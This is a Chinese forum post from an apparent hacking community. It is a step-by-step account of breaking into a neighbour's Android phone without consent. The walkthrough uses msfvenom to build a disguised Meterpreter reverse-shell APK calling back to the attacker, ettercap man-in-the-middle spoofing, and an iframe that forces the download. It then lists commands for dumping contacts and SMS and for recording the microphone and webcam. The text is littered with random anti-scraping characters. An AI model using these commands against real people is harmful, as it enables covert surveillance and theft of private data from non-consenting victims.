中国网络渗透测试联盟

标题: metasploit+ettercap中间人攻击成功入侵邻居手机 [打印本页]
作者: admin    时间: 2018-10-20 20:30
标题: metasploit+ettercap中间人攻击成功入侵邻居手机

1 u& C: M, b" C" [4 Q1 m, w2 j 五、msf+ettercap入侵邻居安卓手机 3 B, A- h# G6 ~ H7 y. [

+ S' b) ^/ h" f5 t( M+ A1 }. }

, ]' U/ G9 F @ 首先启动msf $ r q: C; _, J$ M6 J# x4 }

4 X; `' w/ Z# }+ o0 I

0 J; F0 |! w0 F' h' g+ b' B4 v 先用kali生成一个安卓木马,如下命令: 7 A+ ?. ?3 B) C) ~. @9 L, W

; P% D7 W7 x3 C

% q# _4 v' J+ E( o- Z Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 3 w( b% F/ l3 @ N$ ^

+ p: e# E' Q' N2 N, Z3 F+ i7 ~5 U- T& |. e

0 s& w% Q& r& f# Q* Z% m2 Y! N 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 : z( v1 E! }$ ^. s

0 C; T" `6 V+ w7 B

, _* j7 S! h5 p% { 然后进入msf 1 h9 m1 H/ Y: ^' {

$ M1 B! U' O3 k

& y. X" S8 d! j use exploit/multi/handler 1 G) X, Y- C) h* B# M% l7 Q, P3 r

( i7 M {7 g u C1 ~" U- @

2 t4 Z* y7 X/ ^) ^, T' r1 | set payload android/meterpreter/reverse_tcp + W# s4 ?( ~* C- H, c7 p1 g, h6 Y

; |' b: M. c8 X, W5 d

( s( t2 Q& v/ T3 e D r5 ^ set LHOST 192.168.0.109 //ipkailiip T$ H8 b3 C2 l) v

0 C. v ^ |0 R, ^* o5 u/ V3 B$ Z

6 \8 g v4 k; C/ e; A" \. }2 [! s5 Y set LPORT 44444 //端口一定要与前面生成的木马的端口一致 : j* h0 `! K$ ^! e5 n. C8 h% J1 A( t" G% f

2 N3 A& U1 y" J- J

9 i8 h/ D" T/ h, ^8 |/ Z Exploit % \( c" U6 W K$ Z7 H# V

# _) W" M3 a" T

7 O7 n' Z, n( [ g8 ]! t$ l   5 v& E0 Q$ l G: B

- u6 p2 e. P' y7 D

- \5 n6 Q1 l( h/ E. p+ _ 下面我们开启ettercap -G 8 l: }0 {0 A" [- n) ]7 _4 f

' q) V& O7 x' d0 n% M

/ t/ c* r+ ?0 u% [0 }' [' ^# b+ T 我物理IP 3 N" d& J* k9 s' j! f

4 j( g& V2 A. w4 p, u

% J! m: E) R f2 v6 {, M i% B   $ g& M( Q% p2 [( Y0 C2 |. _

C$ R9 N! G8 V3 i

5 l- f3 z* z8 i/ B0 O) o 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, ' H- `$ W$ z% l' f6 }

8 p4 M; g" ?- ^. l. [! I6 }

2 i: N8 z6 ]+ s 下面我们来设置一下 : V# u e% j- P6 Y) a$ F! L

d0 l. } O5 b3 G) G+ i

9 A( H, y, ^; g   & c8 q* ~- g) `/ p5 b d- e4 J8 \

; M/ v4 \1 n. X) g8 u8 r

/ a3 e: G, A- A0 j7 z7 L9 ]2 t 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 7 A" O' }6 w+ k. p1 V

6 v M# n, K1 F/ E" D

6 P* N3 \0 Y6 h) _: @# q   0 s: i9 N* Y0 w% T0 J3 J$ `

8 R7 k" q! v/ a

3 h4 M# G$ S. q6 A" U   * o. q) ]: C$ i T& q6 A

4 e/ \+ b- Q( e$ J" Q

/ ?+ p7 A) W: h9 C   - J7 K" x' Q/ { C' u, n7 x

0 @: \. L: P9 F; X7 G7 ~! i. X

; J& D) D# S1 _8 X# T   Y. V3 C+ D% ^. F$ @* o- F: ]

) R$ M4 q# S- k. d2 [

2 k6 [3 u$ s7 o8 w   & O3 O( X9 C* s

# D' m: q- s' R: z5 {

@4 R1 f8 _% v7 y: b$ }2 s   5 ^; _5 d* U1 r. q

' G1 `1 |8 ^$ P5 x$ u. z

( |! o I( r1 _ x% H   r' m& `2 F+ z F& o& p7 B

) W% O4 _5 T% {

I8 D2 R% F( c; B9 ~   9 p( n( l. I1 M- Q

* M# x; y7 {' ~4 w! E' M& c9 Z

- w0 D8 r4 J& f9 B0 L& B   5 e, J: n* o' z k% o8 G3 r

! t1 m& T0 A( [! A+ z

: Z! L _1 |* r   5 a C5 v; K* A0 ~# z6 V

6 g' x8 N5 L# C9 W r1 p, b4 y5 I

* z* V, O. |9 L& F7 p   ! B0 j+ K1 V5 N

; z) I5 w2 x2 C

* ]& f6 S) t. ~9 n' K" O) N$ d   0 k# l5 M3 h5 K, u. ?. J

" [ M, U5 s- z* K e

' Z) s1 F p1 s1 p3 V: I4 |, A   ; y1 i7 `: P* d q+ y. F& m

3 v5 W+ \; s* j) } J* G" E

- q! N( o) O i: Y) K 下面我们开始攻击 [4 c1 u9 o# D0 c

. N/ u7 F# T7 E3 j( o" i5 [

: ^/ l' H: e1 }4 M I- C: D   7 E G) c9 z& \' `

& f( Q- x9 C4 n) }" q) p! O ?

/ p8 l% Q1 D- {0 ^# |3 X   1 u" L+ s7 f3 p% W% X0 {: f

; {% {5 ?9 j3 P ]

4 }7 O6 T) R7 h- J8 D# J Q   & Z& [. W8 M) {

1 U/ l0 A! l% u j* Z

7 d/ p& f ^- X+ t" |2 h+ |+ N   : Z8 F$ L! I6 e0 ^

7 t2 C' f3 ~) F

q, B+ k3 G9 P& K   , h5 v5 I: |" e( N. \( _1 p

$ N1 e) ~5 @% d/ _7 |" \/ w$ ~9 l

& u: E+ s9 e7 J. |) z( F 大概过了5分钟多,发现反弹成功了 K/ O' G0 ?, i9 X! w u3 K

, J% N8 f! G) J( ^1 M

" I/ m& Y- i, |2 g3 {8 ?' u# r   ! Q r2 B- {/ n$ x8 d

. J/ {! L5 `9 ?; D* k) v, r( N

3 G# P! o+ u3 [) T+ [   1 U0 i+ K, K( e5 R- n

: v% m8 J. k* K. m. g: h$ Z

2 [9 A; L+ A! H. s4 b5 e   0 d1 Q/ ]/ H' h5 O# I, g6 P

: K* {7 u8 H8 o; J

7 \. ]/ _1 L" G9 u: ^   - b& i9 Q$ Z u" g- V& |

5 u1 D0 G( w0 ?' k

1 N# L9 R$ L9 Y9 ^   ; j! ^5 m8 _! P C z- @, r

4 x$ f% [8 Y, Z" c+ ]

! U3 C9 b/ f' k# e0 `. p" ~   7 ?& j- M5 w, o' K' f; k

- I A/ K( g: ^3 X

8 v' N7 d3 O. N$ P& W   + } l1 b! V; g2 A$ d

( v4 v, |) L# j

$ t" \: Z) H( Y/ i8 h2 d0 } 执行命令 ! c J% O! R# V

( h1 ^1 q% c5 o; y! e

' K" _8 ~3 p) w; M( Z/ W" r' A/ q   ) t% A2 Z& Q* ]: ]

; o/ R# F5 G' X9 G3 p

0 x4 p( t: W. a0 C dump_contacts    --》这个是导出电话 8 G: U, _3 ?+ P. L2 m* T

% n* ~, q2 @) B! T. q0 W+ u

2 q, k$ C+ O7 P3 g- x( [ dump_sms --》这个是导出信息 ; i+ ~$ e% a& G3 t% o" @

. r$ N1 [# S! q% e

) i$ O, g4 `: s7 A9 v4 v record_mic     Record audio from the default microphone for X seconds : ^2 e/ l: T6 c* I" w: \% H1 t0 z

3 L5 ]1 s, t: J2 s

$ \+ X9 n: C; t* u     webcam_chat    Start a video chat 1 s3 ^& }% {8 q6 J8 y# q f- r; H

# k/ R; Z# D* L1 w% p

s! B* B6 K# ~% `- A     webcam_list    List webcams ; I0 H: b8 N- m9 a. `. n5 \9 }! p

! y c# K3 K* q+ g' r" B

6 P- e' R; W7 f; _% D' A     webcam_snap    Take a snapshot from the specified webcam & X& f: k( U& b9 q0 F9 a0 k* K

; _) |/ h7 n( g$ e

3 \$ J+ M" u/ Q7 |3 @+ ?2 l/ a6 Q webcam_stream  lay a video stream from the specified webcam 2 U R- T0 j4 u! V- z

) O8 r& ^$ z+ k4 A

. N3 E" @1 W5 F4 ]% G' ~   : I) w+ n4 j3 b' h, H, C. y

3 z* q* p0 ?5 f: m! @% s$ z

& `! q/ z8 i' R# {   ! K0 S( f: j) R% C% S

+ A, b: }# k& V, E. O

. m0 }, a7 S: i) i1 J6 S- h 我们打开看一下电话薄, 3 p* P5 M. w6 d1 T8 i& [# V$ T

( O& w( G2 \0 p* n) p

! J. Z1 U6 u2 _   : o% q" ~& Z& }' S) g$ f

( D! p( X$ g$ G7 h

& g& m9 |& l3 D7 Y# Q8 l   8 \, N, ]$ ?. D# j

7 u: U( ]3 B% N* M" f' ?4 A2 e% Z

" p$ i5 A7 I, J. w3 Q   1 E J% N) ^' Y0 ^

1 P) b% X% M, A6 p5 u: N

, \; y7 ^& @4 v   . L* A4 ]( j6 t2 r3 G4 c5 L+ c$ f* K6 A' r

8 \8 h$ w; G- ^/ o

3 w, h! n% ?4 ~8 r   + ?( H# J( O% V: o

) T) s/ Z6 z9 P3 c

8 u2 D' o$ B4 i3 p2 e6 F: m   1 }4 E% o% P j) j9 c& Q) L

& ]% k2 a; j; \0 b

) u' Q$ s. G' T 我们同时欺骗成DroidJack木马,使用方法如图: b: E. O) K% U* c. t2 c

6 ~# }0 o1 y( c# Q- I/ |4 S

! w/ d- x; x4 o) M" ?0 G# D   : N5 u, [: p! z& {4 P

: }# G3 h. E3 [9 E

& J; k x) l* O0 ~9 {2 Y   & A4 E* J# E4 p' H8 `1 Q# n

$ l/ y% K& \9 U: x, a

7 _% u8 t! B$ K, B' M   ' h. Q1 h/ ~! c. R0 `" F1 i Y5 G# S

* @) v4 O7 P' e, H H3 D% c% T' [% ?

; i- F i0 J, O2 S 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 5 R" L3 ~; }3 R3 O A$ F

8 Z9 x7 h) O. C7 ?0 I- W9 w

7 Q& ]) K* E4 q# V   / h, I9 A% \4 k2 t& O! J/ `/ x5 s

) |: e+ N" ?( l$ ?" Y8 Y4 G4 L

: w% P2 Y. W: ^/ M0 s( z3 R   + o% y1 F2 O3 H/ p3 X V3 W- e

/ y" J/ |- K! m8 D9 M: Q# _

3 z% r! F# c) o, ], }5 h" U# ^   2 z& H! b5 f" R, b( b6 U; `: I

2 ~2 |3 o5 ^7 Q

7 u; }0 V1 R( [# n9 R3 w. H+ ]" g 1 \5 M" x7 ?/ z$ \3 ~4 k' Q" P

, |" N; L" {, m/ c, }

" N+ d5 y7 w6 E% I# b* e" _1 e8 ?
6 S' Y$ m# ?# K3 _( s! c& M' g





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2